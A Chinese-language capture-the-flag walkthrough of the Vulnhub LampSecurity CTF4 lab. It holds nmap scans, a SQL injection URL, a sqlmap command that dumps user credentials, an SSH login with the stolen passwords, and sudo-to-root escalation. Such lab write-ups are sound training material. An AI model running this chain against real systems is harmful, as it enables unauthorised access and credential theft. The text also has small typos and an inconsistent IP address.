Vulnhub靶机实操笔记-LampSecurity-CTF4
2023-6-18 18:27:5 Author: www.freebuf.com(查看原文) 阅读量:9 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一、Namp扫描

1、主机存活判断

sudo nmap -sn 192.168.32.0./24

1687082992_648ed7f0e32973c413148.png!small?1687082993731

2、快速扫描

以不低于1w的速度快速扫描端口

sudo nmap --min-rate 10000 -p- 192.168.32.141

--min-rate          #以不低于xxx的速度扫描
-p-                 #全端口

1687083027_648ed813036389c71fd6f.png!small?1687083027831

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

sudo nmap -sT -sV -O -p22,80,25,631 172.16.200.130

-sT               #以TCP协议进行扫描
-sV               #服务的版本号
-O                #服务器系统
-p                #指定端口

1687083048_648ed828a64296df895d1.png!small?1687083049520

4、UDP扫描

sudo nmap -sU -p22,25,80,631 192.168.32.141

1687083069_648ed83dbd15cae6f4373.png!small?1687083070547

5、Namp的POC扫描

通过脚本扫描提示有SQL注入漏洞

sudo nmap --script=vuln -p22,25,80,631 192.168.32.141

1687083089_648ed8514502f6438f211.png!small?1687083090412

1687083109_648ed865dfaf00523aae1.png!small?1687083110834

复制脚本提示的URL访问查看

http://192.168.32.141:80/?title=Blog&id=2%27%20OR%20sqlspider&page=blog

通过输入单引号发现疑似存在SQL注入漏洞

1687083130_648ed87ac625e8ce03c2a.png!small?1687083131542

使用sqlmap成功发现注入点

1687083168_648ed8a0636b81464ca70.png!small?1687083169680

通过数据库获得6个用户名和密码

sudo sqlmap -u 'http://192.168.32.141/?title=Blog&id=2%20&page=blog' -p id --dbms mysql --batch -D ehks -T user -C user_name,user_pass --dump

1687083188_648ed8b4cc436c7f879ea.png!small?1687083189819

有账户名和密码直接尝试ssh登陆系统,这边发现登陆ssh的时候出现一点点的意外状况。不同ssh的应用版本和其配置的协议多少存在一些差别,配置文件的写法会有一些差别。

提示没有key exchange,这边要使用KexAlgorithms再接上我们缺少的

sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 [email protected]  

1687083212_648ed8cccf5aab3f76e80.png!small?1687083213752

再次执行提示我们key的类型没有找到,此时使用HostKeyAlgorithms指定具体的算法,经过ssh的小插曲配置调整后,发现第一个账户密码竟成功登陆

sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss  -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 [email protected]  

1687083227_648ed8db736d66acfc94b.png!small?1687083228645

四、内网提权

1、系统详情

uname -a   #显示系统名、节点名称、操作系统的发行版号、内核版本等等

1687083262_648ed8feb3ddc8b39deb9.png!small?1687083263419

2、查看当前系统权限

sudo -l                   #查看用户权限
sudo /bin/bash            #新启动一个新的bash线程命令

1687083276_648ed90c0f198957e7cb3.png!small?1687083276849

1687083288_648ed918058abda85f456.png!small?1687083288696

3、查看定时任务

cat /etc/crontab    #较为常用
cat /etc/cron.d     #比较少用

1687083346_648ed9526fe79a80a2e65.png!small?1687083347255

五、靶场下载链接

https://download.vulnhub.com/lampsecurity/ctf4.zip


文章来源: https://www.freebuf.com/articles/web/369798.html
如有侵权请联系:admin#unsafe.sh